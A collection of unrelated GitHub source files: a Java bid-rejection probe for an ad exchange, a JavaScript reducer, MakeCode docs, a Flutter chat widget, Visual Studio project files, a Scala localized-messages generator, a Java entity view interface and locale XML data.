// can't really assert that the contacts are batch loaded
// via a secondary query join
}
}
| {
"pile_set_name": "Github"
} |
package com.xrtb.probe;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.atomic.LongAdder;
/**
* Reason you don't bid probe.
* @author Ben M. Faul
*
*/
public class Probe {
public static volatile Map<String, ExchangeProbe> probes;
public static final StringBuilder DEAL_PRICE_ERROR = new StringBuilder("This creative price is 0, with no set deals\n");
public static final StringBuilder PRIVATE_AUCTION_LIMITED = new StringBuilder("This creative price is 0, with no set deals, and this is a private auction\n");
public static final StringBuilder NO_WINNING_DEAL_FOUND = new StringBuilder("Error in finding the winning deal in the bid request\n");
public static final StringBuilder NO_APPLIC_DEAL = new StringBuilder("This creative price is 0, with no matching deals in the bid request, and is a private auction\n");
public static final StringBuilder BID_FLOOR = new StringBuilder("Bid floor greater than bid\n");
public static final StringBuilder BID_CREAT_IS_VIDEO = new StringBuilder("Creative is video, request is not\n");
public static final StringBuilder BID_CREAT_IS_BANNER = new StringBuilder("Creative is banner, request is not\n");
public static final StringBuilder BID_CREAT_IS_NATIVE = new StringBuilder("Creative is native content, request is not\n");
public static final StringBuilder NATIVE_LAYOUT = new StringBuilder("Native ad layouts don't match\n");
public static final StringBuilder NATIVE_TITLE = new StringBuilder("Native ad request wants a title, creative has none\n");
public static final StringBuilder NATIVE_TITLE_LEN = new StringBuilder("Native ad title length is too long\n");
public static final StringBuilder NATIVE_WANTS_IMAGE = new StringBuilder("Native ad request wants an img, creative has none\n");
public static final StringBuilder NATIVE_IMAGEW_MISMATCH = new StringBuilder("Native ad img widths dont match\n");
public static final StringBuilder NATIVE_IMAGEH_MISMATCH = new StringBuilder("Native ad img heights dont match\n");
public static final StringBuilder NATIVE_WANTS_VIDEO = new StringBuilder("Native ad request wants a video, creative has none\n");
public static final StringBuilder NATIVE_AD_TOO_SHORT = new StringBuilder("Native ad video duration is < what request wants");
public static final StringBuilder NATIVE_AD_TOO_LONG = new StringBuilder("Native ad video duration is > what request wants\n");
public static final StringBuilder NATIVE_LINEAR_MISMATCH = new StringBuilder("Native ad video linearity doesn't match the ad\n");
public static final StringBuilder NATIVE_AD_PROTOCOL_MISMATCH = new StringBuilder("Native ad video protocol doesn't match the ad\n");
public static final StringBuilder NATIVE_AD_DATUM_MISMATCH = new StringBuilder("Native ad data item mismatch\n");
public static final StringBuilder WH_INTERSTITIAL = new StringBuilder("No width or height specified and campaign is not interstitial\n");
public static final StringBuilder WH_MATCH = new StringBuilder("Creative w or h attributes dont match\n");
public static final StringBuilder VIDEO_LINEARITY = new StringBuilder("Video linearity does not match\n");
public static final StringBuilder VIDEO_TOO_SHORT = new StringBuilder("Video Creative min duration not long enough\n");
public static final StringBuilder VIDEO_TOO_LONG = new StringBuilder("Video Creative max duration too short\n");
public static final StringBuilder VIDEO_PROTOCOL = new StringBuilder("Video Creative protocols don't match\n");
public static final StringBuilder VIDEO_MIME = new StringBuilder("Video Creative mime type mismatch");
public static final StringBuilder CREATIVE_MISMATCH = new StringBuilder("Creative mismatch: ");
LongAdder total = new LongAdder();
public Probe() {
probes = new HashMap();
}
public ExchangeProbe add(String exchange) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = new ExchangeProbe(exchange);
probes.put(exchange, probe);
}
return probe;
}
/**
* Reset the probes to 0.
*/
public void reset() {
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
entry.getValue().reset();
}
total.reset();
}
public void process(String exchange, String campaign, String creative, StringBuilder br) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.process(campaign, creative, br);
}
public void incrementTotal(String exchange, String campaign) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.incrementTotal(campaign);
total.increment();
}
public void incrementBid(String exchange, String campaign) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.incrementBids(campaign);
}
public void process(String exchange, String campaign, String creative) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.process(campaign, creative);
}
public String report() {
StringBuilder report = new StringBuilder();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
String key = entry.getKey();
report.append(key);
report.append("\n");
report.append(entry.getValue().report());
}
return report.toString();
}
public String reportCsv() {
StringBuilder report = new StringBuilder();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
entry.getValue().reportCsv(report,total.sum());
}
return report.toString();
}
/**
* Return a List of objects that denote the exchange, bids, total, and a list of maps of the campaigns.
* @return List. The list of report maps for the exchanges.
*/
public List<Map<String,Object>> getMap() {
List<Map<String,Object>> list = new ArrayList<Map<String,Object>>();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
Map<String,Object> m = new HashMap<String,Object>();
String key = entry.getKey();
m.put("exchange", key);
m.put("bids", entry.getValue().getBids());
m.put("total", entry.getValue().getTotal());
m.put("campaigns",entry.getValue().getMap());
list.add(m);
}
return list;
}
public String getTable() {
StringBuilder table = new StringBuilder();
table.append("<table border='1'>\n");
List list = new ArrayList();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
Map m = new HashMap();
String key = entry.getKey();
table.append("<tr><td>");
table.append(key);
table.append("</td>");
table.append("<td>");
table.append(entry.getValue().getTable());
table.append("</td></tr>\n");
}
table.append("</table>");
return table.toString();
}
}
class KKKV {
Map<Object,Map> K1 = new HashMap();
public KKKV() {
}
public Object get(String k1, String k2, String k3) {
Map<Object,Map> x = K1.get(k1);
if (x == null)
return null;
Map y = x.get(k2);
if (y == null)
return null;
return y.get(k3);
}
public void put(String k1, String k2, String k3, Object v) {
Map<Object,Map> x = K1.get(k1);
if (x == null) {
x = new HashMap();
K1.put(k1, x);
}
Map y = x.get(k2);
if (y == null) {
y = new HashMap();
y.put(k2, y);
}
Map z = (Map)y.get(k3);
if (z == null) {
z = new HashMap();
z.put(k3,v);
}
}
}
| {
"pile_set_name": "Github"
} |
export default function reducer(state, action) {
switch(action.type) {
case INCREMENT:
return state + 1
case DECREMENT:
return state - 1
default:
state
}
}
const INCREMENT = 'CONTADOR:INCREMENT'
const DECREMENT = 'CONTADOR:DECREMENT'
export function increment() {
return {
type: INCREMENT
}
}
export function decrement() {
return {
type: DECREMENT
}
}
| {
"pile_set_name": "Github"
} |
# runtime
Get the time in milliseconds since the game was started.
```sig
game.runtime()
```
## Returns
* a [number](/types/number) which is the amount of time in millseconds since the game started.
## Example #Example
Move a sprite across the screen. When `5` seconds has elapsed, stop the sprite and show the game time.
```blocks
enum SpriteKind {
Player,
Enemy
}
let mySprite: Sprite = null
mySprite = sprites.create(img`
. . . . . 2 2 2 2 2 2 . . . . .
. . 2 2 2 2 2 2 2 2 2 2 2 2 . .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. . 2 2 2 2 2 2 2 2 2 2 2 2 . .
. . . . . 2 2 2 2 2 2 . . . . .
`, SpriteKind.Player)
mySprite.vx = 10
pause(5000)
mySprite.vx = 0
game.showLongText("Game time = " + game.runtime(), DialogLayout.Bottom)
```
## See also #seealso
[start countdown](/reference/info/start-countdown) | {
"pile_set_name": "Github"
} |
import 'package:firebase_database/firebase_database.dart';
import 'package:flutter/material.dart';
var currentUserEmail;
class ChatMessageListItem extends StatelessWidget {
final DataSnapshot messageSnapshot;
final Animation animation;
ChatMessageListItem({this.messageSnapshot, this.animation});
@override
Widget build(BuildContext context) {
return new SizeTransition(
sizeFactor:
new CurvedAnimation(parent: animation, curve: Curves.decelerate),
child: new Container(
margin: const EdgeInsets.symmetric(vertical: 10.0),
child: new Row(
children: currentUserEmail == messageSnapshot.value['email']
? getSentMessageLayout()
: getReceivedMessageLayout(),
),
),
);
}
List<Widget> getSentMessageLayout() {
return <Widget>[
new Expanded(
child: new Column(
crossAxisAlignment: CrossAxisAlignment.end,
children: <Widget>[
new Text(messageSnapshot.value['senderName'],
style: new TextStyle(
fontSize: 14.0,
color: Colors.black,
fontWeight: FontWeight.bold)),
new Container(
margin: const EdgeInsets.only(top: 5.0),
child: messageSnapshot.value['imageUrl'] != null
? new Image.network(
messageSnapshot.value['imageUrl'],
width: 250.0,
)
: new Text(messageSnapshot.value['text']),
),
],
),
),
new Column(
crossAxisAlignment: CrossAxisAlignment.end,
children: <Widget>[
new Container(
margin: const EdgeInsets.only(left: 8.0),
child: new CircleAvatar(
backgroundImage:
new NetworkImage(messageSnapshot.value['senderPhotoUrl']),
)),
],
),
];
}
List<Widget> getReceivedMessageLayout() {
return <Widget>[
new Column(
crossAxisAlignment: CrossAxisAlignment.start,
children: <Widget>[
new Container(
margin: const EdgeInsets.only(right: 8.0),
child: new CircleAvatar(
backgroundImage:
new NetworkImage(messageSnapshot.value['senderPhotoUrl']),
)),
],
),
new Expanded(
child: new Column(
crossAxisAlignment: CrossAxisAlignment.start,
children: <Widget>[
new Text(messageSnapshot.value['senderName'],
style: new TextStyle(
fontSize: 14.0,
color: Colors.black,
fontWeight: FontWeight.bold)),
new Container(
margin: const EdgeInsets.only(top: 5.0),
child: messageSnapshot.value['imageUrl'] != null
? new Image.network(
messageSnapshot.value['imageUrl'],
width: 250.0,
)
: new Text(messageSnapshot.value['text']),
),
],
),
),
];
}
}
| {
"pile_set_name": "Github"
} |
<UserControl
x:Class="Quarrel.Controls.FFTVisualizer"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Quarrel.Controls"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
xmlns:canvas="using:Microsoft.Graphics.Canvas.UI.Xaml"
mc:Ignorable="d"
d:DesignHeight="300"
d:DesignWidth="400">
<Grid>
<canvas:CanvasAnimatedControl Draw="CanvasAnimatedControl_Draw" SizeChanged="CanvasAnimatedControl_SizeChanged"/>
</Grid>
</UserControl>
| {
"pile_set_name": "Github"
} |
activeProfiles=
eclipse.preferences.version=1
fullBuildGoals=process-test-resources
resolveWorkspaceProjects=true
resourceFilterGoals=process-resources resources\:testResources
skipCompilerPlugin=true
version=1
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
<ProjectGuid>{CA63949B-E3AF-4979-BDA4-44DF2C4C53E3}</ProjectGuid>
<OutputType>AppContainerExe</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>ColorTestApp.UWP</RootNamespace>
<AssemblyName>ColorTestApp.UWP</AssemblyName>
<DefaultLanguage>en-US</DefaultLanguage>
<TargetPlatformIdentifier>UAP</TargetPlatformIdentifier>
<TargetPlatformVersion>10.0.14393.0</TargetPlatformVersion>
<TargetPlatformMinVersion>10.0.10240.0</TargetPlatformMinVersion>
<MinimumVisualStudioVersion>14</MinimumVisualStudioVersion>
<EnableDotNetNativeCompatibleProfile>true</EnableDotNetNativeCompatibleProfile>
<FileAlignment>512</FileAlignment>
<ProjectTypeGuids>{A5A43C5B-DE2A-4C0C-9213-0A381AF9435A};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
<PackageCertificateKeyFile>Windows_TemporaryKey.pfx</PackageCertificateKeyFile>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|ARM'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\ARM\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>ARM</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|ARM'">
<OutputPath>bin\ARM\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>ARM</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\x64\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>x64</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
<OutputPath>bin\x64\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x64</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\x86\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>x86</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
<OutputPath>bin\x86\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x86</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<ItemGroup>
<!-- A reference to the entire .Net Framework and Windows SDK are automatically included -->
<None Include="project.json" />
</ItemGroup>
<ItemGroup>
<Compile Include="App.xaml.cs">
<DependentUpon>App.xaml</DependentUpon>
</Compile>
<Compile Include="MainPage.xaml.cs">
<DependentUpon>MainPage.xaml</DependentUpon>
</Compile>
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<AppxManifest Include="Package.appxmanifest">
<SubType>Designer</SubType>
</AppxManifest>
<None Include="Windows_TemporaryKey.pfx" />
</ItemGroup>
<ItemGroup>
<Content Include="Properties\Default.rd.xml" />
<Content Include="Assets\LockScreenLogo.scale-200.png" />
<Content Include="Assets\SplashScreen.scale-200.png" />
<Content Include="Assets\Square150x150Logo.scale-200.png" />
<Content Include="Assets\Square44x44Logo.scale-200.png" />
<Content Include="Assets\Square44x44Logo.targetsize-24_altform-unplated.png" />
<Content Include="Assets\StoreLogo.png" />
<Content Include="Assets\Wide310x150Logo.scale-200.png" />
</ItemGroup>
<ItemGroup>
<ApplicationDefinition Include="App.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</ApplicationDefinition>
<Page Include="MainPage.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</Page>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\ColorThief.Forms.UWP\ColorThief.Forms.UWP.csproj">
<Project>{e024472b-2c3b-4aac-a271-10c24787ad73}</Project>
<Name>ColorThief.Forms.UWP</Name>
</ProjectReference>
</ItemGroup>
<PropertyGroup Condition=" '$(VisualStudioVersion)' == '' or '$(VisualStudioVersion)' < '14.0' ">
<VisualStudioVersion>14.0</VisualStudioVersion>
</PropertyGroup>
<Import Project="..\ColorTestApp\ColorTestApp.projitems" Label="Shared" Condition="Exists('..\ColorTestApp\ColorTestApp.projitems')" />
<Import Project="$(MSBuildExtensionsPath)\Microsoft\WindowsXaml\v$(VisualStudioVersion)\Microsoft.Windows.UI.Xaml.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project> | {
"pile_set_name": "Github"
} |
package jsmessages
import play.api.i18n.Messages
import play.api.libs.json.{JsValue, Json, Writes}
import play.twirl.api.JavaScript
import scala.collection.compat._
/**
* Generate a JavaScript function computing localized messages of a Play application.
*
* Typical usage (from within a Play controller):
*
* {{{
* val jsMessages: JsMessages = ???
*
* val messages = Action { implicit request =>
* Ok(jsMessages(Some("window.Messages")))
* }
* }}}
*
* Then on client-side:
*
* {{{
* console.log(Messages("greeting", "Julien")); // prints "Hello, Julien!"
* }}}
*
* See [[JsMessagesFactory]] to know how to get a `JsMessages` instance.
*
* @param allMessagesData All the messages of the application, as a map of (lang -> map(key -> message pattern)). As it
* is the case in Play, JsMessages assumes that “default” messages are indexed by the `"default"`
* and `"default.play"` language codes.
*/
class JsMessages(allMessagesData: Map[String, Map[String, String]]) {
// Message patterns have to escape quotes using double quotes, here we unescape them because we don’t support using quotes to escape format elements
// TODO Also remove subformats
private val allMessagesUnescaped: Map[String, Map[String, String]] =
allMessagesData.view.mapValues(_.view.mapValues(_.replace("''", "'")).toMap).toMap
/**
* Messages for each available lang of the application.
*
* The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
lazy val allMessages: Map[String, Map[String, String]] = for ((lang, msgs) <- allMessagesUnescaped) yield {
lang match {
// Do not merge with "default" if its "default.play"
case "default.play" => lang -> allMessagesUnescaped.getOrElse("default.play", Map.empty)
case _ => lang -> (
allMessagesUnescaped.getOrElse("default.play", Map.empty) ++
allMessagesUnescaped.getOrElse("default", Map.empty) ++
extractCountry(lang).flatMap(country => allMessagesUnescaped.get(country)).getOrElse(Map.empty) ++
msgs
)
}
}
/**
* Same as `allMessages`, but as a JSON value.
*/
final val allMessagesJson: JsValue = Json.toJson(allMessages)
// Cache of all the messages map as a JSON object
private val allMessagesCache: String = allMessagesJson.toString()
// Per lang cache of the messages
private val messagesCache: Map[String, String] = allMessages.view.mapValues(map => formatMap(map)).toMap
/**
* @param messages Messages instance containing the lang to retrieve messages for
* @return The messages defined for the given language `lang`, as a map
* of (key -> message). The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
def messages(implicit messages: Messages): Map[String, String] = lookupLang(allMessages, messages)
/**
* @param messages Messages instance containing the lang to retrieve messages for
* @return The JSON formatted string of the for the given language `lang`. This is strictly equivalent to
* `Json.toJson(jsMessages.messages).toString`, but may be faster due to the use of caching.
*/
def messagesString(implicit messages: Messages): String = lookupLang(messagesCache, messages)
/**
* Generates a JavaScript function computing localized messages in the given implicit `Lang`.
*
* For example:
*
* {{{
* val messages = Action { implicit request =>
* Ok(jsMessages(Some("window.Messages")))
* }
* }}}
*
* Then use it in your JavaScript code as follows:
*
* {{{
* alert(Messages('greeting', 'World'));
* }}}
*
* Provided you have the following message in your `conf/messages` file:
*
* {{{
* greeting=Hello {0}!
* }}}
*
* Note: This implementation does not handle quotes escaping in patterns and subformats (see
* http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html)
*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this
* function will just generate a function. Otherwise it will generate a function and assign
* it to the given namespace. Note: you can set something like `Some("var Messages")` to use
* a fresh variable.
* @param messages Messages instance defining the language to use. The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
def apply(namespace: Option[String] = None)(implicit messages: Messages): JavaScript = apply(namespace, messagesString)
/**
* Generates a JavaScript function computing localized messages in all the languages of the application.
*
* For example:
*
* {{{
* val messages = Action {
* Ok(jsMessages.all(Some("window.Messages")))
* }
* }}}
*
* Then use it in your JavaScript code as follows:
*
* {{{
* alert(Messages('en', 'greeting', 'World'));
* }}}
*
* Provided you have the following message in your `conf/messages` file:
*
* {{{
* greeting=Hello {0}!
* }}}
*
* Note that, given a message key, the JavaScript function will search the corresponding message in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*
* Note: This implementation does not handle quotes escaping in patterns and subformats (see
* http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html)
*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this
* function will just generate a function. Otherwise it will generate a function and
* assign it to the given namespace. Note: you can set something like
* `Some("var Messages")` to use a fresh variable.
*/
def all(namespace: Option[String] = None): JavaScript = all(namespace, allMessagesCache)
/**
* @param namespace Optional namespace that will contain the generated function
* @param messages Map of (key -> message) to use, as a JSON literal
* @return a JavaScript function taking a key and eventual arguments and returning a formatted message
*/
private def apply(namespace: Option[String], messages: String): JavaScript = {
JavaScript(s""" #${namespace.map{_ + "="}.getOrElse("")}(function(u){function f(k){
#var m;
#if(typeof k==='object'){
#for(var i=0,l=k.length;i<l&&f.messages[k[i]]===u;++i);
#m=f.messages[k[i]]||k[0]
#}else{
#m=((f.messages[k]!==u)?f.messages[k]:k)
#}
#for(i=1;i<arguments.length;i++){
#m=m.replace('{'+(i-1)+'}',arguments[i])
#}
#return m};
#f.messages=$messages;
#return f})()""".stripMargin('#'))
}
/*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this function will
* just return a literal function. Otherwise it will generate a function and assign it to the given namespace.
* Note: you can set something like `Some("var Messages")` to use a fresh variable.
* @param messages String correctly formatted as JSON corresponding the to Map of messages.
* @return A JavaScript fragment defining a function computing all messages
*/
private def all(namespace: Option[String], messages: String): JavaScript = {
// g(key): given a lang, try to find a key among all possible messages,
// will try lang, lang.language, default and finally default.play
// h(key,args...): return the formatted message retrieved from g(lang,key)
// f(lang,key,args...): if only lang, return anonymous function always calling h by prefixing arguments with lang
// else, just call h with current arguments
JavaScript(s""" #${namespace.map{_ + "="}.getOrElse("")}(function(u){function f(l,k){
#function g(kg){
#var r=f.messages[l] && f.messages[l][kg];
#if (r===u&&l&&l.indexOf('-')>-1) {var lg=l.split('-')[0];r=f.messages[lg] && f.messages[lg][kg];}
#if (r===u) {r=f.messages['default'] && f.messages['default'][kg];}
#if (r===u) {r=f.messages['default.play'] && f.messages['default.play'][kg];}
#return r;
#}
#function h(kh){
#var m;
#if(typeof kh==='object'){
#for(var i=0,le=kh.length;i<le&&g(kh[i])===u;++i);
#m=g(kh[i])||kh[0];
#}else{
#m=g(kh);
#m=((m!==u)?m:kh);
#}
#for(i=1,le=arguments.length;i<le;++i){
#m=m.replace('{'+(i-1)+'}',arguments[i])
#}
#return m;
#}
#if(k===undefined){
#return h;
#}else{
#return h.apply({}, Array.prototype.slice.call(arguments, 1));
#}
#}
#f.messages=$messages;
#return f})()""".stripMargin('#'))
}
private def formatMap[A : Writes](map: Map[String, A]): String = Json.toJson(map).toString()
private def extractCountry(lang: String): Option[String] = if (lang.contains("-")) Some(lang.split("-")(0)) else None
private def lookupLang[A](data: Map[String, A], messages: Messages): A = {
val lang = messages.lang
// Try to get the messages for the lang
data.get(lang.code)
// If none, try to get it from its country
.orElse(extractCountry(lang.code).flatMap(country => data.get(country)))
// If none, fallback to default
.orElse(data.get("default"))
// If none, screw that, crash the system! It's your fault for no having a default.
.getOrElse(sys.error(s"Lang $lang is not supported by the application. Consider adding it to your 'application.langs' key in your 'conf/application.conf' file or at least provide a default messages file."))
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 - 2020 Blazebit.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.blazebit.persistence.view.testsuite.collections.ordered.model;
import com.blazebit.persistence.view.EntityView;
import com.blazebit.persistence.view.IdMapping;
import com.blazebit.persistence.view.testsuite.collections.entity.simple.DocumentForCollections;
/**
*
* @author Christian Beikov
* @since 1.0.0
*/
@EntityView(DocumentForCollections.class)
public interface BaseDocumentView {
@IdMapping
public Long getId();
public String getName();
public PersonWithSetAsListView getOwner();
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<ldml>
<identity>
<language type="en"/>
</identity>
<dates>
<calendars>
<calendar type="buddhist">
<eras>
<eraAbbr>
<era type="0">BE</era>
</eraAbbr>
</eras>
</calendar>
<calendar type="chinese">
<months>
<monthContext type="format">
<monthWidth type="abbreviated">
<month type="1">Mo1</month>
<month type="2">Mo2</month>
<month type="3">Mo3</month>
<month type="4">Mo4</month>
<month type="5">Mo5</month>
<month type="6">Mo6</month>
<month type="7">Mo7</month>
<month type="8">Mo8</month>
<month type="9">Mo9</month>
<month type="10">Mo10</month>
<month type="11">Mo11</month>
<month type="12">Mo12</month>
</monthWidth>
<monthWidth type="wide">
<month type="1">First Month</month>
<month type="2">Second Month</month>
<month type="3">Third Month</month>
<month type="4">Fourth Month</month>
<month type="5">Fifth Month</month>
<month type="6">Sixth Month</month>
<month type="7">Seventh Month</month>
<month type="8">Eighth Month</month>
<month type="9">Ninth Month</month>
<month type="10">Tenth Month</month>
<month type="11">Eleventh Month</month>
<month type="12">Twelfth Month</month>
</monthWidth>
</monthContext>
</months>
<cyclicNameSets>
<cyclicNameSet type="zodiacs">
<cyclicNameContext type="format">
<cyclicNameWidth type="abbreviated">
<cyclicName type="1">Rat</cyclicName>
<cyclicName type="2">Ox</cyclicName>
<cyclicName type="3">Tiger</cyclicName>
<cyclicName type="4">Rabbit</cyclicName>
<cyclicName type="5">Dragon</cyclicName>
<cyclicName type="6">Snake</cyclicName>
<cyclicName type="7">Horse</cyclicName>
<cyclicName type="8">Goat</cyclicName>
<cyclicName type="9">Monkey</cyclicName>
<cyclicName type="10">Rooster</cyclicName>
<cyclicName type="11">Dog</cyclicName>
<cyclicName type="12">Pig</cyclicName>
</cyclicNameWidth>
</cyclicNameContext>
</cyclicNameSet>
</cyclicNameSets>
</calendar>
<calendar type="generic">
</calendar>
<calendar type="gregorian">
<months>
<monthContext type="format">
<monthWidth type="wide">
<month type="1">enWideM1</month>
<month type="2">enWideM2</month>
<month type="3">enWideM3</month>
<month type="4">enWideM4</month>
<month type="5">enWideM5</month>
<month type="6">enWideM6</month>
<month type="7">enWideM7</month>
<month type="8">enWideM8</month>
<month type="9">enWideM9</month>
<month type="10">enWideM10</month>
<month type="11">enWideM11</month>
<month type="12">enWideM12</month>
</monthWidth>
</monthContext>
<monthContext type="stand-alone">
<monthWidth type="narrow">
<month type="1">enNarrowM1</month>
<month type="2">enNarrowM2</month>
<month type="3">enNarrowM3</month>
<month type="4">enNarrowM4</month>
<month type="5">enNarrowM5</month>
<month type="6">enNarrowM6</month>
<!-- missing -->
<month type="8">enNarrowM8</month>
<month type="9">enNarrowM9</month>
<month type="10">enNarrowM10</month>
<month type="11">enNarrowM11</month>
<month type="12">enNarrowM12</month>
</monthWidth>
</monthContext>
</months>
<eras>
<eraNames>
<era type="0">Before Christ</era>
<era type="0" alt="variant">Before Common Era</era>
<era type="1">Anno Domini</era>
<era type="1" alt="variant">Common Era</era>
</eraNames>
<eraAbbr>
<era type="0">BC</era>
<era type="0" alt="variant">BCE</era>
<era type="1">AD</era>
<era type="1" alt="variant">CE</era>
</eraAbbr>
<!-- nothing for eraNarrow -->
</eras>
</calendar>
<calendar type="hebrew">
<eras>
<eraAbbr>
